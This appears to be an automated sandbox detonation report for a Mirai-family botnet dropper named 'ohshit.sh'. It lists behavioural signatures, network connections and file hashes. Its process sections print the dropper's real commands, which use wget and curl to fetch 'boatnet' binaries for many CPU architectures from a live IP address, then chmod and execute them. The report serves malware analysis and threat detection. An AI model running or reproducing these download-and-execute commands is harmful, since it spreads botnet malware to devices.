memory/1644-13-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1660-14-0x0000000008048000-0x00000000080547a0-memory.dmp

memory/1680-15-0x0000000008048000-0x00000000080547a0-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

debian9-armhf-20240418-en

Max time kernel

139s

Max time network

144s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/636/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/588/cmdline /tmp/WTF N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/852/cmdline /tmp/WTF N/A
File opened for reading /proc/862/cmdline /tmp/WTF N/A
File opened for reading /proc/822/cmdline /tmp/WTF N/A
File opened for reading /proc/809/cmdline /tmp/WTF N/A
File opened for reading /proc/858/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/639/cmdline /tmp/WTF N/A
File opened for reading /proc/767/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/848/cmdline /tmp/WTF N/A
File opened for reading /proc/852/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/586/cmdline /tmp/WTF N/A
File opened for reading /proc/644/cmdline /tmp/WTF N/A
File opened for reading /proc/830/cmdline /tmp/WTF N/A
File opened for reading /proc/856/cmdline /tmp/WTF N/A
File opened for reading /proc/858/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/631/cmdline /tmp/WTF N/A
File opened for reading /proc/829/cmdline /tmp/WTF N/A
File opened for reading /proc/846/cmdline /tmp/WTF N/A
File opened for reading /proc/588/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/exe /tmp/WTF N/A
File opened for reading /proc/573/cmdline /tmp/WTF N/A
File opened for reading /proc/637/cmdline /tmp/WTF N/A
File opened for reading /proc/854/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/638/cmdline /tmp/WTF N/A
File opened for reading /proc/673/cmdline /tmp/WTF N/A
File opened for reading /proc/816/cmdline /tmp/WTF N/A
File opened for reading /proc/862/cmdline /tmp/WTF N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/exe /tmp/WTF N/A
File opened for reading /proc/637/cmdline /tmp/WTF N/A
File opened for reading /proc/807/cmdline /tmp/WTF N/A
File opened for reading /proc/673/cmdline /tmp/WTF N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/850/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/854/cmdline /tmp/WTF N/A
File opened for reading /proc/636/cmdline /tmp/WTF N/A
File opened for reading /proc/638/cmdline /tmp/WTF N/A
File opened for reading /proc/809/cmdline /tmp/WTF N/A
File opened for reading /proc/844/cmdline /tmp/WTF N/A
File opened for reading /proc/846/cmdline /tmp/WTF N/A
File opened for reading /proc/639/cmdline /tmp/WTF N/A
File opened for reading /proc/573/cmdline /tmp/WTF N/A
File opened for reading /proc/594/cmdline /tmp/WTF N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/594/cmdline /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

/tmp/WTF

MD5 e3206d28c93769f5acb5e1e1d5b5f219
SHA1 198b56e1df06819e1141c1d6e8f7ad7d1646194c
SHA256 cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab
SHA512 dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503

/tmp/WTF

MD5 d94c95baa8be09e30fcdc154241477c8
SHA1 d0b682898bd94b01afb6ad2f4fb813197f6a0985
SHA256 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6
SHA512 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 fb08806a49f2c5aa8f8ea71c0ca40395
SHA1 411ae81e99b9c3ec9d27514a7c18cb5c63189b22
SHA256 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c
SHA512 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3

memory/763-1-0x00008000-0x0001dca4-memory.dmp

memory/784-2-0x00008000-0x0001b6e4-memory.dmp

memory/801-3-0x00008000-0x000228c4-memory.dmp

memory/806-4-0x00008000-0x00026464-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

debian9-mipsbe-20240611-en

Max time kernel

148s

Max time network

141s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/677/cmdline /tmp/WTF N/A
File opened for reading /proc/759/cmdline /tmp/WTF N/A
File opened for reading /proc/782/cmdline /tmp/WTF N/A
File opened for reading /proc/794/cmdline /tmp/WTF N/A
File opened for reading /proc/805/cmdline /tmp/WTF N/A
File opened for reading /proc/813/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/668/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/671/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/824/cmdline /tmp/WTF N/A
File opened for reading /proc/687/cmdline /tmp/WTF N/A
File opened for reading /proc/750/cmdline /tmp/WTF N/A
File opened for reading /proc/757/cmdline /tmp/WTF N/A
File opened for reading /proc/818/cmdline /tmp/WTF N/A
File opened for reading /proc/887/cmdline /tmp/WTF N/A
File opened for reading /proc/717/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/855/cmdline /tmp/WTF N/A
File opened for reading /proc/709/cmdline /tmp/WTF N/A
File opened for reading /proc/826/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/701/cmdline /tmp/WTF N/A
File opened for reading /proc/702/cmdline /tmp/WTF N/A
File opened for reading /proc/707/cmdline /tmp/WTF N/A
File opened for reading /proc/784/cmdline /tmp/WTF N/A
File opened for reading /proc/808/cmdline /tmp/WTF N/A
File opened for reading /proc/760/cmdline /tmp/WTF N/A
File opened for reading /proc/827/cmdline /tmp/WTF N/A
File opened for reading /proc/851/cmdline /tmp/WTF N/A
File opened for reading /proc/869/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/893/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/706/cmdline /tmp/WTF N/A
File opened for reading /proc/874/cmdline /tmp/WTF N/A
File opened for reading /proc/892/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/806/cmdline /tmp/WTF N/A
File opened for reading /proc/789/cmdline /tmp/WTF N/A
File opened for reading /proc/817/cmdline /tmp/WTF N/A
File opened for reading /proc/898/cmdline /tmp/WTF N/A
File opened for reading /proc/678/cmdline /tmp/WTF N/A
File opened for reading /proc/875/cmdline /tmp/WTF N/A
File opened for reading /proc/904/cmdline /tmp/WTF N/A
File opened for reading /proc/414/cmdline /tmp/WTF N/A
File opened for reading /proc/823/cmdline /tmp/WTF N/A
File opened for reading /proc/881/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/708/cmdline /tmp/WTF N/A
File opened for reading /proc/711/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/811/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

